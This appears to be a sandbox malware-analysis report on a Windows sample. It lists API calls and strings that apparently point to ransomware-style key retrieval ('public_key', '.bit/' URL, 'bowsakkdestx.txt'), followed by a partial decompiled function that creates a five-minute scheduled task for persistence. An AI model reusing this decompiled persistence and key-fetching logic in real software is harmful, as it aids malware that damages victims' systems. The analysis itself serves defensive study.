0x0041ee12
0x0041ee15
0x0041ee1a
0x0041ee1a
0x0041ee1d
0x0041ee1f
0x0041ee22
0x0041ee27
0x0041ee27
0x00000000
0x0041ee1f
0x00000000
0x0041edad
0x0041edae
0x0041edb4
0x0041edb6
0x0041ee44
0x00000000
0x0041ee44
0x00000000
0x0041edb6
0x0041edab
0x0041ecdf
0x00000000
0x0041ecdf
0x0041eca0
0x0041eca0
0x0041eca8
0x00000000
0x00000000
0x0041ecb1
0x0041ecb3
0x0041ecb5
0x0041ecb7
0x00000000
0x00000000
0x00000000
0x0041ecb9
0x0041ecbb
0x00000000
0x0041ebe6
0x0041ebe6
0x0041ebea
0x0041ee2a
0x0041ee2a
0x0041ee33
0x0041ee34
0x0041ee38
0x0041ee3a
0x0041ee58
0x0041ee5d
0x0041ee60
0x0041ee68
0x0041ee70
0x0041ee75
0x0041ee80
0x0041ee80
0x0041ee82
0x0041ee86
0x0041ee86
0x0041ee89
0x0041ee8c
0x0041ee92
0x0041ee94
0x0041ee97
0x0041ee97
0x0041ee99
0x0041ee9a
0x0041ee9a
0x0041ee9e
0x0041ee9e
0x00000000
0x0041ee9e
0x0041ee8e
0x0041eea0
0x0041eea0
0x0041eea6
0x0041eeab
0x0041eeac
0x0041eeac
0x0041eebc
0x0041eec1
0x0041eec4
0x0041eecc
0x0041eed4
0x0041eed9
0x0041eee1
0x0041eee1
0x0041eee3
0x0041eee7
0x0041eee7
0x0041eeea
0x0041eeed
0x0041eef3
0x0041eef5
0x0041eef8
0x0041eef8
0x0041eefa
0x0041eefb
0x0041eefb
0x0041eeff
0x0041eeff
0x00000000
0x0041eeff
0x0041eeef
0x0041ef01
0x0041ef01
0x0041ef07
0x0041ef0c
0x0041ef0d
0x0041ef0d
0x0041ef12
0x0041ef1c
0x0041ef20
0x0041ef24
0x0041ef2b
0x0041ef33
0x0041ef35
0x0041ef40
0x0041ef45
0x0041ef48
0x0041ef4c
0x0041ef4e
0x0041ef4e
0x0041ef50
0x0041ef61
0x0041ef63
0x0041ef68
0x0041ef6e
0x0041ef73
0x0041ef73
0x0041ef76
0x0041ef79
0x0041ef7e
0x0041ef84
0x0041ef88
0x0041ef8f
0x0041ef97
0x0041ef9a
0x0041efa7
0x0041efac
0x0041efaf
0x0041efb3
0x0041efb5
0x0041efb5
0x0041efbf
0x0041efc1
0x0041efc6
0x0041efcc
0x0041efd1
0x0041efd1
0x0041efd4
0x0041efd9
0x0041efe0
0x0041efe6
0x0041efeb
0x0041efeb
0x0041efee
0x0041eff3
0x0041effb
0x0041f003
0x0041f008
0x0041f00e
0x0041f013
0x0041f016
0x0041f01a
0x0041f021
0x0041f025
0x0041f030
0x0041f030
0x0041ee3c
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e71b
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041e722
0x0041e6e0
0x00000000
0x0041ebea
0x0041ebe4
0x0041eb14
0x00000000
0x0041eb14
0x0041ead0
0x0041ead0
0x0041ead8
0x00000000
0x00000000
0x0041eae1
0x0041eae3
0x0041eae5
0x0041eae7
0x00000000
0x00000000
0x00000000
0x0041eae9
0x0041eaeb
0x00000000
0x0041eaeb
0x0041ea46
0x00000000
0x00000000
0x0041ea4c
0x0041ea59
0x0041ea61
0x0041ea74
0x0041ea82
0x0041ea82
0x00000000
0x0041e72e
0x0041e73b
0x0041e749
0x0041e74b
0x0041e755
0x0041e75d
0x0041e762
0x0041e765
0x0041e768
0x0041e76f
0x0041e772
0x0041e778
0x0041e77a
0x0041e77a
0x0041e780
0x0041e780
0x0041e783
0x0041e786
0x0041e789
0x00000000
0x0041e78b
0x0041e78b
0x0041e78b
0x0041e78d
0x00000000
0x0041e78d
0x0041e774
0x0041e774
0x0041e78f
0x0041e78f
0x0041e795
0x0041e79a
0x0041e7a3
0x0041e7a8
0x0041e7ad
0x0041e7ae
0x0041e7b3
0x0041e7b6
0x0041e7b8
0x0041e7be
0x0041e7c3
0x0041e7c5
0x0041e7c7
0x0041e7ce
0x0041e7d6
0x0041e7de
0x0041e7ec
0x0041e7ee
0x0041e7f5
0x0041e7f7
0x0041e80e
0x0041e816
0x0041e81e
0x0041e823
0x0041e827
0x0041e844
0x0041e848
0x0041e829
0x0041e82c
0x0041e82c
0x0041e82d
0x0041e838
0x0041e83d
0x0041e83d
0x0041e82d
0x0041e851
0x0041e858
0x0041e85c
0x0041e85e
0x0041e865
0x0041e86c
0x0041e86c
0x0041e86f
0x0041e874
0x0041e87a
0x0041e87f
0x0041e87f
0x0041e874
0x0041e882
0x0041e88d
0x0041e892
0x0041e895
0x0041e89a
0x0041e89f
0x0041e8a3
0x0041e8aa
0x0041e8b2
0x0041e8b5
0x0041e8ba
0x0041e8c2
0x0041e8c7
0x0041e8ca
0x0041e8cc
0x0041e8d3
0x0041e8db
0x0041e8e0
0x0041e8e5
0x0041e8eb
0x0041e8f0
0x0041e8f0
0x0041e8f3
0x0041e8fc
0x0041e90a
0x0041e910
0x0041e917
0x0041e919
0x0041e920
0x0041e922
0x0041e927
0x0041e92e
0x0041e937
0x0041e930
0x0041e930
0x0041e930
0x0041e93d
0x0041e93d
0x0041e920
0x0041e95a
0x0041e96f
0x0041e975
0x0041e97a
0x0041e97c
0x0041e98c
0x0041e992
0x0041e994
0x0041e9a3
0x0041e9b6
0x0041e9bb
0x0041e9bd
0x0041e9c0
0x0041e9c2
0x0041e9c4
0x0041e9d3
0x0041e9db
0x0041e9dd
0x0041e9de
0x0041e9e3
0x0041e9e4
0x0041e9e9
0x0041e9e9
0x0041e9c2
0x0041e994
0x0041e9f3
0x0041e9f6
0x0041e9f8
0x0041ea03
0x0041ea08
0x0041ea0e
0x0041ea13
0x0041ea13
0x0041ea16
0x0041ea19
0x00000000
0x0041ea19
0x0041e772
0x0041ebf0
0x0041ec00
0x0041ec06
0x0041ec0c
0x0041ec0f
0x0041ec0f
0x0041ec24
0x0041ec32
0x0041e6e0
0x0041e6e0
0x00000000
0x0041e6e6
0x0041edc3
0x0041edc3
0x0041edd3
0x0041edd9
0x0041eddf
0x0041ede2
0x0041ede2
0x0041edf7
0x0041ee05
0x0041ee05

APIs

timeGetTime.WINMM ref: 0041E6C0

Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32 ref: 0041E90A
lstrcatW.KERNEL32 ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32 ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32 ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32
lstrlenW.KERNEL32(?), ref: 0041EC3E
lstrlenA.KERNEL32(","id":"), ref: 0041EC51
lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
lstrlenA.KERNEL32(?), ref: 0041EC93
lstrlenA.KERNEL32(00000022), ref: 0041ECB3
lstrcpyW.KERNEL32 ref: 0041ED2A
lstrlenA.KERNEL32(?), ref: 0041ED4B
_malloc.LIBCMT ref: 0041ED55
_memset.LIBCMT ref: 0041ED63
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
lstrcpyW.KERNEL32 ref: 0041ED85
lstrlenW.KERNEL32(?), ref: 0041EDA3
lstrlenW.KERNEL32(?), ref: 0041EDAE
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
DeleteFileA.KERNEL32(?), ref: 0041EE05
_free.LIBCMT ref: 0041EE15
_free.LIBCMT ref: 0041EE22
lstrcpyW.KERNEL32 ref: 0041EF61
lstrcpyW.KERNEL32 ref: 0041EFBF

Strings

&first=true, xrefs: 0041E930
{"public_key":", xrefs: 0041EA2E, 0041EA8D
", xrefs: 0041ECA0
bowsakkdestx.txt, xrefs: 0041E996, 0041EA67, 0041EC17, 0041EDEA
&first=false, xrefs: 0041E937
Microsoft Internet Explorer, xrefs: 0041E736
","id":", xrefs: 0041EBC5, 0041EC4C
.bit/, xrefs: 0041E7A3
?pid=, xrefs: 0041E884

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
API String ID: 704684250-3586605218
Opcode ID: 04331b3a06f64e4c3aec63a14267df824faf032539a98349e72c165f58ae39e4
Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
Opcode Fuzzy Hash: 04331b3a06f64e4c3aec63a14267df824faf032539a98349e72c165f58ae39e4
Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				void* _t327;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4, 0);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff); // executed
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0"); // executed
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx"); // executed
																										_t327 = E00423551( &_v92); // executed
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33);
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize(); // executed
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
